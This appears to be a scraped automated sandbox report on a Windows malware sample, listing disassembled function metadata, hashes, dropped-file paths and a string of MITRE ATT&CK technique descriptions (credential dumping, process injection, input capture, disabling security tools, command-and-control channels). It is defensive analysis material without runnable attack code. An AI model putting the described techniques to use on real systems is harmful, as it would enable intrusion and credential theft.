API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: 8d85533ed8d975ae662a2afd674d57d8e7904306660bb327c6e864706f990115
Instruction ID: d35f21fa7d16cdec57c69859374dd6cafb3434ad6ed6fda06f299a5aa10b4d72
Opcode Fuzzy Hash: 8d85533ed8d975ae662a2afd674d57d8e7904306660bb327c6e864706f990115
Instruction Fuzzy Hash: 8AE06D782007408FDB32DF28E648342BAE8AF00704F008A7DE496CB2D0E7F4E408CBA1

Function 003E5964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003E596E
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 003E5981

Part of subcall function 003C5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003C52BC

Strings

Shell_TrayWnd, xrefs: 003E5967

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: b6e4dedabe1020cd57273653b776672bf31bde4c5a96328eed82b36d0965e62a
Instruction ID: ce929a98e844ed08f54984c0c7fe34e9c490117d6fde123694fd66adeb71f74b
Opcode Fuzzy Hash: b6e4dedabe1020cd57273653b776672bf31bde4c5a96328eed82b36d0965e62a
Instruction Fuzzy Hash: 7ED0C931384351BBE675AB709C8BFD66A59AB50B55F100929B249AE1D0CAE4A840C658

Function 003E5998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003E59AE
PostMessageW.USER32(00000000), ref: 003E59B5

Part of subcall function 003C5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003C52BC

Strings

Shell_TrayWnd, xrefs: 003E59A7

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 366c5114612f7ec8b428676750c5aa941f7f43ae8865bbf0661fa42eff87e07c
Instruction ID: 84e231b2c468f738997c523c5ae52bbac75b81aaf2d1763aea9cd3865517e98f
Opcode Fuzzy Hash: 366c5114612f7ec8b428676750c5aa941f7f43ae8865bbf0661fa42eff87e07c
Instruction Fuzzy Hash: B5D0A9313803007BE675AB309C8BFC26A18AB40B00F000829B205EE1D0CAE0A800C658

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report aBEh0fsi2c.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\341G64J42

C:\Users\user\AppData\Local\Temp\aut482C.tmp

C:\Users\user\AppData\Local\Temp\scroll

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Windows Analysis Report
aBEh0fsi2c.exe

Function 00363B3A Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153
windowCOMMON

Function 003649A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Function 00364E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Function 003C9155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Function 0036301C Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73
windowregistryCOMMON

Function 00363A46 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 71
windowregistryCOMMON

Function 00363041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Function 0036708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 00363633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
windowtimeregistryCOMMON

Function 00363766 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267
COMMON

Function 0036F76F Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168
comCOMMON

Function 00E78AC8 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 003639D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre